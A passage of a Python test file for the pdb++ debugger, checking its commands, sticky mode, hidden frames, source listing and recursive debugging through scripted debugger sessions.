return c check(fn, """ [NUM] > .*fn() -> return c 5 frames hidden .* # c 42 # !c do_shell_called: 'c' 42 # r = 5 # r 5 # r = 6 # r 6 # !!c """) def test_parseline_with_rc_commands(tmpdir, monkeypatch): """Test that parseline handles execution of rc lines during setup.""" monkeypatch.delenv("HOME", raising=False) monkeypatch.delenv("USERPROFILE", raising=False) with tmpdir.as_cwd(): with open(".pdbrc", "w") as f: f.writelines([ "p 'readrc'\n", "alias myalias print(%1)\n", ]) def fn(): alias = "trigger" # noqa: F841 set_trace(readrc=True) check(fn, """ --Return-- 'readrc' [NUM] > .*fn()->None -> set_trace(readrc=True) 5 frames hidden .* # alias myalias \\*\\*\\* SyntaxError # !!alias myalias myalias = print(%1) # myalias 42 42 # c """) def test_parseline_with_existing_command(): def fn(): c = 42 set_trace() return c check(fn, """ [NUM] > .*fn() -> return c 5 frames hidden .* # print(pdb.local.GLOBAL_PDB.parseline("foo = ")) ('foo', '=', 'foo =') # print(pdb.local.GLOBAL_PDB.parseline("c = ")) (None, None, 'c = ') # print(pdb.local.GLOBAL_PDB.parseline("a = ")) (None, None, 'a = ') # print(pdb.local.GLOBAL_PDB.parseline("list()")) (None, None, 'list()') # c 42 # cont """) def test_args_name(): def fn(): args = 42 set_trace() return args check(fn, """ [NUM] > .*fn() -> return args 5 frames hidden .* # args 42 # c """) def lineno(): """Returns the current line number in our program.""" return inspect.currentframe().f_back.f_lineno @pytest.mark.parametrize("command,expected_regex", [ ("", r"Documented commands \(type help <topic>\):"), ("EOF", "Handles the receipt of EOF as a command."), ("a", "Print the argument"), ("alias", "an alias"), ("args", "Print the argument"), ("b", "set a break"), ("break", "set a break"), ("bt", "Print a stack trace"), ("c", "Continue execution, only stop when a breakpoint"), ("cl", "clear all breaks"), ("clear", "clear all breaks"), ("commands", "Specify a list of commands for breakpoint"), ("condition", "must evaluate to true"), ("cont", "Continue execution, only stop when a breakpoint"), ("continue", "Continue execution, only stop when a breakpoint"), ("d", "Move the current frame .* down"), ("debug", "Enter a recursive debugger"), ("disable", "Disables the breakpoints"), ("display", "Add expression to the display list"), ("down", "Move the current frame .* down"), ("ed", "Open an editor"), ("edit", "Open an editor"), ("enable", "Enables the breakpoints"), ("exit", "Quit from the debugger."), ("h", "h(elp)"), ("help", "h(elp)"), ("hf_hide", "hide hidden frames"), ("hf_unhide", "unhide hidden frames"), ("ignore", "ignore count for the given breakpoint"), ("interact", "Start an interative interpreter"), ("j", "Set the next line that will be executed."), ("jump", "Set the next line that will be executed."), ("l", "List source code for the current file."), ("list", "List source code for the current file."), ("ll", "List source code for the current function."), ("longlist", "List source code for the current function."), ("n", "Continue execution until the next line"), ("next", "Continue execution until the next line"), ("p", "Print the value of the expression"), ("pp", "Pretty-print the value of the expression."), ("q", "Quit from the debugger."), ("quit", "Quit from the debugger."), ("r", "Continue execution until the current function returns."), ("restart", "Restart the debugged python program."), ("return", "Continue execution until the current function returns."), ("run", "Restart the debugged python program"), ("s", "Execute the current line, stop at the first possible occasion"), ("step", "Execute the current line, stop at the first possible occasion"), ("sticky", "Toggle sticky mode"), ("tbreak", "arguments as break"), ("track", "track expression"), ("u", "Move the current frame .* up"), ("unalias", "specified alias."), ("undisplay", "Remove expression from the display list"), ("unt", "until the line"), ("until", "until the line"), ("up", "Move the current frame .* up"), ("w", "Print a stack trace"), ("whatis", "Prints? the type of the argument."), ("where", "Print a stack trace"), ("hidden_frames", "Some frames might be marked as \"hidden\""), ("exec", r"Execute the \(one-line\) statement"), ("hf_list", r"\*\*\* No help"), ("paste", r"\*\*\* No help"), ("put", r"\*\*\* No help"), ("retval", r"\*\*\* No help|return value"), ("rv", r"\*\*\* No help|return value"), ("source", r"\*\*\* No help"), ("unknown_command", r"\*\*\* No help"), ("help", "print the list of available commands."), ]) def test_help(command, expected_regex): from pdb import StringIO instance = PdbTest() instance.stdout = StringIO() # Redirect sys.stdout because Python 2 pdb.py has `print >>self.stdout` for # some functions and plain ol' `print` for others. oldstdout = sys.stdout sys.stdout = instance.stdout try: instance.do_help(command) finally: sys.stdout = oldstdout output = instance.stdout.getvalue() assert re.search(expected_regex, output) def test_shortlist(): def fn(): a = 1 set_trace(Config=ConfigTest) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l {line_num}, 3 NUM +\t def fn(): NUM +\t a = 1 NUM +\t set_trace(Config=ConfigTest) NUM +-> return a # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_with_pygments_and_EOF(): def fn(): a = 1 set_trace(Config=ConfigWithPygments) return a check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m a 5 frames hidden .* # l {line_num}, 3 [EOF] # c """.format(line_num=100000)) def test_shortlist_with_highlight_and_EOF(): def fn(): a = 1 set_trace(Config=ConfigWithHighlight) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l {line_num}, 3 [EOF] # c """.format(line_num=100000)) def test_shortlist_with_pygments(): def fn(): a = 1 set_trace(Config=ConfigWithPygments) return a check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m a 5 frames hidden .* # l {line_num}, 5 NUM +\t$ NUM +\t ^[[38;5;28;01mdef^[[39;00m ^[[38;5;21mfn^[[39m(): NUM +\t a ^[[38;5;241m=^[[39m ^[[38;5;241m1^[[39m NUM +\t set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) NUM +\t$ NUM +->\t ^[[38;5;28;01mreturn^[[39;00m a # c """.format(line_num=fn.__code__.co_firstlineno - 1)) def test_shortlist_with_highlight(): def fn(): a = 1 set_trace(Config=ConfigWithHighlight) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l {line_num}, 4 <COLORNUM> +\t def fn(): <COLORNUM> +\t a = 1 <COLORNUM> +\t set_trace(Config=ConfigWithHighlight) <COLORNUM> +\t$ <COLORNUM> +->\t return a # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_without_arg(): """Ensure that forget was called for lineno.""" def fn(): a = 1 set_trace(Config=ConfigTest) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l NUM \tdef test_shortlist_without_arg(): NUM \t \"""Ensure that forget was called for lineno.\""" .* .* .* .* .* .* .* NUM \t-> return a NUM \t 5 frames hidden .* # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_heuristic(): def fn(): a = 1 set_trace(Config=ConfigTest) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # list {line_num}, 3 NUM \t def fn(): NUM \t a = 1 NUM \t set_trace(Config=ConfigTest) NUM -> return a # list(range(4)) [0, 1, 2, 3] # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_with_second_set_trace_resets_lineno(): def fn(): def f1(): set_trace(cleanup=False) set_trace() f1() check(fn, r""" [NUM] > .*fn() -> f1() 5 frames hidden .* # l {line_num}, 2 NUM \t def fn(): NUM \t def f1(): NUM \t set_trace(cleanup=False) # import pdb; pdb.local.GLOBAL_PDB.lineno {set_lineno} # c --Return-- [NUM] > .*f1()->None -> set_trace(cleanup=False) 5 frames hidden .* # import pdb; pdb.local.GLOBAL_PDB.lineno # c """.format( line_num=fn.__code__.co_firstlineno, set_lineno=fn.__code__.co_firstlineno + 2, )) def test_longlist(): def fn(): a = 1 set_trace() return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # ll NUM def fn(): NUM a = 1 NUM set_trace() NUM -> return a # c """) def test_longlist_with_highlight(): def fn(): a = 1 set_trace(Config=ConfigWithHighlight) return a check(fn, r""" [NUM] > .*fn() -> return a 5 frames hidden .* # ll <COLORNUM> def fn(): <COLORNUM> a = 1 <COLORNUM> set_trace(Config=ConfigWithHighlight) ^[[39;49;7m^[[36;01;39;49;7m\d+^[[00;39;49;7m -> return a ^[[00m # c """) # noqa: E501 def test_display(): def fn(): a = 1 set_trace() b = 1 # noqa: F841 a = 2 a = 3 return a check(fn, """ [NUM] > .*fn() -> b = 1 5 frames hidden .* # display a # n [NUM] > .*fn() -> a = 2 5 frames hidden .* # n [NUM] > .*fn() -> a = 3 5 frames hidden .* a: 1 --> 2 # undisplay a # n [NUM] > .*fn() -> return a 5 frames hidden .* # c """) def test_display_undefined(): def fn(): set_trace() b = 42 return b check(fn, """ [NUM] > .*fn() -> b = 42 5 frames hidden .* # display b # n [NUM] > .*fn() -> return b 5 frames hidden .* b: <undefined> --> 42 # c """) def test_sticky(): def fn(): set_trace() a = 1 b = 2 # noqa: F841 c = 3 # noqa: F841 return a check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # sticky <CLEARSCREEN> >.* NUM def fn(): NUM set_trace() NUM -> a = 1 NUM b = 2 NUM c = 3 NUM return a # n [NUM] > .*fn() -> b = 2 5 frames hidden .* <CLEARSCREEN> >.* NUM def fn(): NUM set_trace() NUM a = 1 NUM -> b = 2 NUM c = 3 NUM return a # sticky # n [NUM] > .*fn() -> c = 3 5 frames hidden .* # c """) def test_sticky_range(): def fn(): set_trace() a = 1 b = 2 # noqa: F841 c = 3 # noqa: F841 return a _, lineno = inspect.getsourcelines(fn) start = lineno + 1 end = lineno + 3 check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # sticky %d %d <CLEARSCREEN> >.* %d \\s+ set_trace() NUM -> a = 1 NUM b = 2 # c """ % (start, end, start)) def test_sticky_by_default(): class MyConfig(ConfigTest): sticky_by_default = True def fn(): set_trace(Config=MyConfig) a = 1 b = 2 # noqa: F841 c = 3 # noqa: F841 return a check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* .* NUM def fn(): NUM set_trace(Config=MyConfig) NUM -> a = 1 NUM b = 2 NUM c = 3 NUM return a # n [NUM] > .*fn() -> b = 2 5 frames hidden .* <CLEARSCREEN> >.* NUM def fn(): NUM set_trace(Config=MyConfig) NUM a = 1 NUM -> b = 2 NUM c = 3 NUM return a # c """) def test_sticky_dunder_exception(): """Test __exception__ being displayed in sticky mode.""" def fn(): def raises(): raise InnerTestException() set_trace() raises() check(fn, """ [NUM] > .*fn() -> raises() 5 frames hidden (try 'help hidden_frames') # n .*InnerTestException.* ### via pdb.Pdb.user_exception (differs on py3/py27) [NUM] > .*fn() -> raises() 5 frames hidden .* # sticky <CLEARSCREEN> > {filename}(NUM) NUM def fn(): NUM def raises(): NUM raise InnerTestException() NUM NUM set_trace(.*) NUM -> raises() InnerTestException: # c """.format( filename=__file__, )) def test_sticky_dunder_exception_with_highlight(): """Test __exception__ being displayed in sticky mode.""" class ConfigWithCurrentLineColor(ConfigWithHighlight): current_line_color = 44 def fn(): def raises(): raise InnerTestException() set_trace(Config=ConfigWithCurrentLineColor) raises() check(fn, """ [NUM] > .*fn() -> raises() 5 frames hidden (try 'help hidden_frames') # n .*InnerTestException.* ### via pdb.Pdb.user_exception (differs on py3/py27) [NUM] > .*fn() -> raises() 5 frames hidden .* # sticky <CLEARSCREEN> > {filename}(NUM) <COLORNUM> def fn(): <COLORNUM> def raises(): <COLORNUM> raise InnerTestException() <COLORNUM> <COLORNUM> set_trace(.*) <COLORCURLINE> -> raises().* <COLORLNUM>InnerTestException: <COLORRESET> # c """.format( filename=__file__, )) def test_format_exc_for_sticky(): _pdb = PdbTest() f = _pdb._format_exc_for_sticky assert f((Exception, Exception())) == "Exception: " exc_from_str = Exception("exc_from_str") class UnprintableExc: def __str__(self): raise exc_from_str assert f((UnprintableExc, UnprintableExc())) == ( "UnprintableExc: (unprintable exception: %r)" % exc_from_str ) class UnprintableExc: def __str__(self): class RaisesInRepr(Exception): def __repr__(self): raise Exception() raise RaisesInRepr() assert f((UnprintableExc, UnprintableExc())) == ( "UnprintableExc: (unprintable exception)" ) assert f((1, 3, 3)) == 'pdbpp: got unexpected __exception__: (1, 3, 3)' def test_sticky_dunder_return(): """Test __return__ being displayed in sticky mode.""" def fn(): def returns(): return 40 + 2 set_trace() returns() check(fn, """ [NUM] > .*fn() -> returns() 5 frames hidden (try 'help hidden_frames') # s --Call-- [NUM] > .*returns() -> def returns() 5 frames hidden .* # sticky <CLEARSCREEN> >.* NUM -> def returns(): NUM return 40 \\+ 2 # retval \\*\\*\\* Not yet returned! # r --Return-- [NUM] > .*(NUM)returns()->42 -> return 40 \\+ 2 5 frames hidden .* <CLEARSCREEN> > {filename}(NUM) NUM def returns(): NUM -> return 40 \\+ 2 return 42 # retval 42 # c """.format( filename=__file__, )) def test_sticky_with_user_exception_does_not_clear_screen(): def fn(): def throws(): raise InnerTestException() set_trace() throws() check(fn, """ [NUM] > .*fn() -> throws() 5 frames hidden (try 'help hidden_frames') # s --Call-- [NUM] > .*throws() -> def throws(): 5 frames hidden .* # sticky <CLEARSCREEN> >.* NUM -> def throws(): NUM raise InnerTestException() # n [NUM] > .*throws() -> raise InnerTestException() 5 frames hidden .* <CLEARSCREEN> >.* NUM def throws(): NUM -> raise InnerTestException() # n .*InnerTestException [NUM] > .*throws() -> raise InnerTestException() 5 frames hidden .* # c """) def test_sticky_dunder_return_with_highlight(): class ConfigWithPygments(ConfigWithHighlight): use_pygments = True current_line_color = 44 def fn(): def returns(): return 40 + 2 set_trace(Config=ConfigWithPygments) returns() expected, lines = run_func(fn, '# s\n# sticky\n# r\n# retval\n# c') assert lines[-4:] == [ '^[[36;01m return 42^[[00m', '# retval', '42', '# c', ] colored_cur_lines = [ x for x in lines if x.startswith('^[[44m^[[36;01;44m') and '->' in x ] assert len(colored_cur_lines) == 2 def test_exception_lineno(): def bar(): assert False def fn(): try: a = 1 # noqa: F841 bar() b = 2 # noqa: F841 except AssertionError: xpm() check(fn, """ Traceback (most recent call last): File "{filename}", line NUM, in fn bar() File "{filename}", line NUM, in bar assert False AssertionError.* [NUM] > .*bar() -> assert False # u [NUM] > .*fn() -> bar() # ll NUM def fn(): NUM try: NUM a = 1 NUM >> bar() NUM b = 2 NUM except AssertionError: NUM -> xpm() # c """.format( filename=__file__, )) def test_postmortem_noargs(): def fn(): try: a = 1 # noqa: F841 1/0 except ZeroDivisionError: pdb.post_mortem(Pdb=PdbTest) check(fn, """ [NUM] > .*fn() -> 1/0 # c """) def test_postmortem_needs_exceptioncontext(): try: # py.test bug - doesnt clear the index error from finding the next item sys.exc_clear() except AttributeError: # Python 3 doesn't have sys.exc_clear pass py.test.raises(AssertionError, pdb.post_mortem, Pdb=PdbTest) def test_exception_through_generator(): def gen(): yield 5 assert False def fn(): try: for i in gen(): pass except AssertionError: xpm() check(fn, """ Traceback (most recent call last): File "{filename}", line NUM, in fn for i in gen(): File "{filename}", line NUM, in gen assert False AssertionError.* [NUM] > .*gen() -> assert False # u [NUM] > .*fn() -> for i in gen(): # c """.format( filename=__file__, )) def test_py_code_source(): # noqa: F821 src = py.code.Source(""" def fn(): x = 42 set_trace() return x """) exec(src.compile(), globals()) check(fn, # noqa: F821 """ [NUM] > .*fn() -> return x 5 frames hidden .* # ll NUM def fn(): NUM x = 42 NUM set_trace() NUM -> return x # c """) def test_source(): def bar(): return 42 def fn(): set_trace() return bar() check(fn, """ [NUM] > .*fn() -> return bar() 5 frames hidden .* # source bar NUM def bar(): NUM return 42 # c """) def test_source_with_pygments(): def bar(): return 42 def fn(): set_trace(Config=ConfigWithPygments) return bar() check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m bar() 5 frames hidden .* # source bar NUM ^[[38;5;28;01mdef^[[39;00m ^[[38;5;21mbar^[[39m(): NUM NUM ^[[38;5;28;01mreturn^[[39;00m ^[[38;5;241m42^[[39m # c """) def test_source_with_highlight(): def bar(): return 42 def fn(): set_trace(Config=ConfigWithHighlight) return bar() check(fn, """ [NUM] > .*fn() -> return bar() 5 frames hidden .* # source bar <COLORNUM> def bar(): <COLORNUM> <COLORNUM> return 42 # c """) def test_source_with_pygments_and_highlight(): def bar(): return 42 def fn(): set_trace(Config=ConfigWithPygmentsAndHighlight) return bar() check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m bar() 5 frames hidden .* # source bar <COLORNUM> ^[[38;5;28;01mdef^[[39;00m ^[[38;5;21mbar^[[39m(): <COLORNUM> <COLORNUM> ^[[38;5;28;01mreturn^[[39;00m ^[[38;5;241m42^[[39m # c """) def test_bad_source(): def fn(): set_trace() return 42 check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # source 42 \*\* Error: .*module, class, method, function, traceback, frame, or code object .*\*\* # c """) # noqa: E501 def test_edit(): def fn(): set_trace() return 42 def bar(): fn() return 100 _, lineno = inspect.getsourcelines(fn) return42_lineno = lineno + 2 call_fn_lineno = lineno + 5 filename = os.path.abspath(__file__) if filename.endswith('.pyc'): filename = filename[:-1] check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # edit RUN emacs \+%d %s # c """ % (return42_lineno, filename)) check(bar, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # up [NUM] > .*bar() -> fn() # edit RUN emacs \+%d %s # c """ % (call_fn_lineno, filename)) def test_edit_obj(): def fn(): bar() set_trace() return 42 def bar(): pass _, bar_lineno = inspect.getsourcelines(bar) filename = os.path.abspath(__file__) if filename.endswith('.pyc'): filename = filename[:-1] check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # edit bar RUN emacs \+%d %s # c """ % (bar_lineno, filename)) def test_edit_py_code_source(): src = py.code.Source(""" def bar(): set_trace() return 42 """) _, base_lineno = inspect.getsourcelines(test_edit_py_code_source) dic = {'set_trace': set_trace} exec(src.compile(), dic) # 8th line from the beginning of the function bar = dic['bar'] src_compile_lineno = base_lineno + 8 filename = os.path.abspath(__file__) if filename.endswith('.pyc'): filename = filename[:-1] check(bar, r""" [NUM] > .*bar() -> return 42 5 frames hidden .* # edit bar RUN emacs \+%d %s # c """ % (src_compile_lineno, filename)) def test_put(tmphome): def fn(): set_trace() return 42 _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 1 check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # x = 10 # y = 12 # put RUN epaste \+%d ' x = 10\\n y = 12\\n' # c """ % start_lineno) def test_paste(): def g(): print('hello world') def fn(): set_trace() if 4 != 5: g() return 42 _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 1 check(fn, r""" [NUM] > .*fn() -> if 4 != 5: 5 frames hidden .* # g() hello world # paste g() hello world RUN epaste \+%d 'hello world\\n' # c hello world """ % start_lineno) def test_put_if(): def fn(): x = 0 if x < 10: set_trace() return x _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 3 check(fn, r""" [NUM] > .*fn() -> return x 5 frames hidden .* # x = 10 # y = 12 # put RUN epaste \+%d .*x = 10\\n y = 12\\n. # c """ % start_lineno) def test_side_effects_free(): r = pdb.side_effects_free assert r.match(' x') assert r.match('x.y[12]') assert not r.match('x(10)') assert not r.match(' x = 10') assert not r.match('x = 10') def test_put_side_effects_free(tmphome): def fn(): x = 10 # noqa: F841 set_trace() return 42 _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 2 check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # x 10 # x.__add__ .* # y = 12 # put RUN epaste \+%d ' y = 12\\n' # c """ % start_lineno) def test_enable_disable_via_module(): def fn(): x = 1 pdb.disable() set_trace_via_module() x = 2 pdb.enable() set_trace_via_module() return x check(fn, """ [NUM] > .*fn() -> return x 5 frames hidden .* # x 2 # c """) def test_enable_disable_from_prompt_via_class(): def fn(): pdb_ = PdbTest() pdb_.set_trace() x = 1 pdb_.set_trace() x = 2 pdb.enable() pdb_.set_trace() return x check(fn, """ [NUM] > .*fn() -> x = 1 5 frames hidden .* # pdb.disable() # c [NUM] > .*fn() -> return x 5 frames hidden .* # x 2 # c """) def test_hideframe(): @pdb.hideframe def g(): pass assert g.__code__.co_consts[-1] is pdb._HIDE_FRAME def test_hide_hidden_frames(): @pdb.hideframe def g(): set_trace() return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*fn() -> g() 6 frames hidden .* # down ... Newest frame # hf_unhide # down [NUM] > .*g() -> return 'foo' # up [NUM] > .*fn() -> g() # hf_hide ### hide the frame again # down ... Newest frame # c """) def test_hide_current_frame(): @pdb.hideframe def g(): set_trace() return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*fn() -> g() 6 frames hidden .* # hf_unhide # down ### now the frame is no longer hidden [NUM] > .*g() -> return 'foo' # hf_hide ### hide the current frame, go to the top of the stack [NUM] > .*fn() -> g() # c """) def test_hide_frame_for_set_trace_on_class(): def g(): # Simulate set_trace, with frame=None. pdb.cleanup() _pdb = PdbTest() _pdb.set_trace() return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*g() -> return 'foo' 5 frames hidden .* # hf_unhide # down \\*\\*\\* Newest frame # c """) def test_list_hidden_frames(): @pdb.hideframe def g(): set_trace() return 'foo' @pdb.hideframe def k(): return g() def fn(): k() return 1 check(fn, r""" [NUM] > .*fn() -> k() 7 frames hidden .* # hf_list .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*k() -> return g() .*g() -> return 'foo' # c """) def test_hidden_pytest_frames(): def s(): __tracebackhide__ = True # Ignored for set_trace in here. set_trace() return 'foo' def g(s=s): __tracebackhide__ = True return s() def k(g=g): return g() k = pdb.rebind_globals(k, {'__tracebackhide__': True}) def fn(): k() return 1 check(fn, r""" [NUM] > .*s() -> return 'foo' 7 frames hidden .* # hf_list .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*k() -> return g() .*g() -> return s() # c """) def test_hidden_unittest_frames(): def s(set_trace=set_trace): set_trace() return 'foo' def g(s=s): return s() g = pdb.rebind_globals(g, {'__unittest': True}) def fn(): return g() check(fn, r""" [NUM] > .*s() -> return 'foo' 6 frames hidden .* # hf_list .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*g() -> return s() # c """) def test_dont_show_hidden_frames_count(): class MyConfig(ConfigTest): show_hidden_frames_count = False @pdb.hideframe def g(): set_trace(Config=MyConfig) return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*fn() -> g() # c ### note that the hidden frame count is not displayed """) def test_disable_hidden_frames(): class MyConfig(ConfigTest): enable_hidden_frames = False @pdb.hideframe def g(): set_trace(Config=MyConfig) return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*g() -> return 'foo' # c ### note that we were inside g() """) def test_break_on_setattr(): # we don't use a class decorator to keep 2.5 compatibility class Foo(object): pass Foo = pdb.break_on_setattr('x', Pdb=PdbTest)(Foo) def fn(): obj = Foo() obj.x = 0 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 0 5 frames hidden .* # hasattr(obj, 'x') False # n [NUM] > .*fn() -> return obj.x 5 frames hidden .* # p obj.x 0 # c """) def test_break_on_setattr_without_hidden_frames(): class PdbWithConfig(PdbTest): def __init__(self, *args, **kwargs): class Config(ConfigTest): enable_hidden_frames = False super(PdbWithConfig, self).__init__(*args, Config=Config, **kwargs) class Foo(object): pass Foo = pdb.break_on_setattr('x', Pdb=PdbWithConfig)(Foo) def fn(): obj = Foo() obj.x = 0 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 0 # hasattr(obj, 'x') False # n [NUM] > .*fn() -> return obj.x # p obj.x 0 # c """) def test_break_on_setattr_condition(): def mycond(obj, value): return value == 42 class Foo(object): pass # we don't use a class decorator to keep 2.5 compatibility Foo = pdb.break_on_setattr('x', condition=mycond, Pdb=PdbTest)(Foo) def fn(): obj = Foo() obj.x = 0 obj.x = 42 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 42 5 frames hidden .* # obj.x 0 # n [NUM] > .*fn() -> return obj.x 5 frames hidden .* # obj.x 42 # c """) def test_break_on_setattr_non_decorator(): class Foo(object): pass def fn(): a = Foo() b = Foo() def break_if_a(obj, value): return obj is a pdb.break_on_setattr("bar", condition=break_if_a, Pdb=PdbTest)(Foo) b.bar = 10 a.bar = 42 check(fn, """ [NUM] > .*fn() -> a.bar = 42 5 frames hidden .* # c """) def test_break_on_setattr_overridden(): # we don't use a class decorator to keep 2.5 compatibility class Foo(object): def __setattr__(self, attr, value): object.__setattr__(self, attr, value+1) Foo = pdb.break_on_setattr('x', Pdb=PdbTest)(Foo) def fn(): obj = Foo() obj.y = 41 obj.x = 0 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 0 5 frames hidden .* # obj.y 42 # hasattr(obj, 'x') False # n [NUM] > .*fn() -> return obj.x 5 frames hidden .* # p obj.x 1 # c """) def test_track_with_no_args(): pytest.importorskip('rpython.translator.tool.reftracker') def fn(): set_trace() return 42 check(fn, """ [NUM] > .*fn() -> return 42 # track ... SyntaxError: # c """) def test_utf8(): def fn(): # тест a = 1 set_trace(Config=ConfigWithHighlight) return a # we cannot easily use "check" because the output is full of ANSI escape # sequences expected, lines = run_func(fn, '# ll\n# c') assert u'тест' in lines[5] def test_debug_normal(): def g(): a = 1 return a def fn(): g() set_trace() return 1 check(fn, """ [NUM] > .*fn() -> return 1 5 frames hidden .* # debug g() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) s --Call-- [NUM] > .*g() -> def g(): (#) ll NUM -> def g(): NUM a = 1 NUM return a (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_debug_thrice(): def fn(): set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) debug 2 ENTERING RECURSIVE DEBUGGER [NUM] > .* ((#)) debug 34 ENTERING RECURSIVE DEBUGGER [NUM] > .* (((#))) p 42 42 (((#))) c LEAVING RECURSIVE DEBUGGER ((#)) c LEAVING RECURSIVE DEBUGGER (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_syntaxerror_in_command(): expected_debug_err = "ENTERING RECURSIVE DEBUGGER\n\\*\\*\\* SyntaxError: .*" # Python 3.8.0a2+ handles the SyntaxError itself. # Ref/followup: https://github.com/python/cpython/pull/12103 # https://github.com/python/cpython/commit/3e93643 if sys.version_info >= (3, 7, 3): expected_debug_err += "\nLEAVING RECURSIVE DEBUGGER" def f(): set_trace() check(f, """ --Return-- [NUM] > .*f() -> set_trace 5 frames hidden .* # print( \\*\\*\\* SyntaxError: .* # debug print( %s # c """ % expected_debug_err) def test_debug_with_overridden_continue(): class CustomPdb(PdbTest, object): """CustomPdb that overrides do_continue like with pytest's wrapper.""" def do_continue(self, arg): global count_continue count_continue += 1 print("do_continue_%d" % count_continue) return super(CustomPdb, self).do_continue(arg) do_c = do_cont = do_continue def g(): a = 1 return a def fn(): global count_continue count_continue = 0 g() set_trace(Pdb=CustomPdb) set_trace(Pdb=CustomPdb) assert count_continue == 3 return 1 check(fn, """ [NUM] > .*fn() -> set_trace(Pdb=CustomPdb) 5 frames hidden .* # c do_continue_1 [NUM] > .*fn() -> assert count_continue == 3 5 frames hidden .* # debug g() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) s --Call-- [NUM] > .*g() -> def g(): (#) ll NUM -> def g(): NUM a = 1 NUM return a (#) c do_continue_2 LEAVING RECURSIVE DEBUGGER # c do_continue_3 """) def test_before_interaction_hook(): class MyConfig(ConfigTest): def before_interaction_hook(self, pdb): pdb.stdout.write('HOOK!\n') def fn(): set_trace(Config=MyConfig) return 1 check(fn, """ [NUM] > .*fn() -> return 1 5 frames hidden .* HOOK! # c """) def test_unicode_bug(): def fn(): set_trace() x = "this is plain ascii" # noqa: F841 y = "this contains a unicode: à" # noqa: F841 return check_output = """ [NUM] > .*fn() -> x = "this is plain ascii" 5 frames hidden .* # n [NUM] > .*fn() -> y = "this contains a unicode: à" 5 frames hidden .* # c """ if sys.version_info < (3, ): check_output = check_output.decode('utf-8') check(fn, check_output) def test_continue_arg(): def fn(): set_trace() x = 1 y = 2 z = 3 return x+y+z _, lineno = inspect.getsourcelines(fn) line_z = lineno+4 check(fn, """ [NUM] > .*fn() -> x = 1 5 frames hidden .* # c {break_lnum} Breakpoint NUM at {filename}:{break_lnum} Deleted breakpoint NUM [NUM] > .*fn() -> z = 3 5 frames hidden .* # c """.format( break_lnum=line_z, filename=__file__, )) @pytest.mark.skipif(sys.version_info < (3, 7), reason="header kwarg is 3.7+") def test_set_trace_header(): """Handler header kwarg added with Python 3.7 in pdb.set_trace.""" def fn(): set_trace_via_module(header="my_header") check(fn, """ my_header --Return-- [NUM] > .*fn() -> set_trace.* 5 frames hidden .* # c """) def test_stdout_encoding_None(): instance = PdbTest() instance.stdout = BytesIO() instance.stdout.encoding = None instance.ensure_file_can_write_unicode(instance.stdout) try: import cStringIO except ImportError: pass else: instance.stdout = cStringIO.StringIO() instance.ensure_file_can_write_unicode(instance.stdout) def test_frame_cmd_changes_locals(): def a(): x = 42 # noqa: F841 b() def b(): fn() def fn(): set_trace() return check(a, """ [NUM] > .*fn() -> return 5 frames hidden .* # f {frame_num_a} [NUM] > .*a() -> b() # p list(sorted(locals().keys())) ['b', 'x'] # c """.format(frame_num_a=count_frames() + 2 - 5)) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "_cmdloop"), reason="_cmdloop is not available") def test_sigint_in_interaction_with_new_cmdloop(): def fn(): def inner(): raise KeyboardInterrupt() set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames 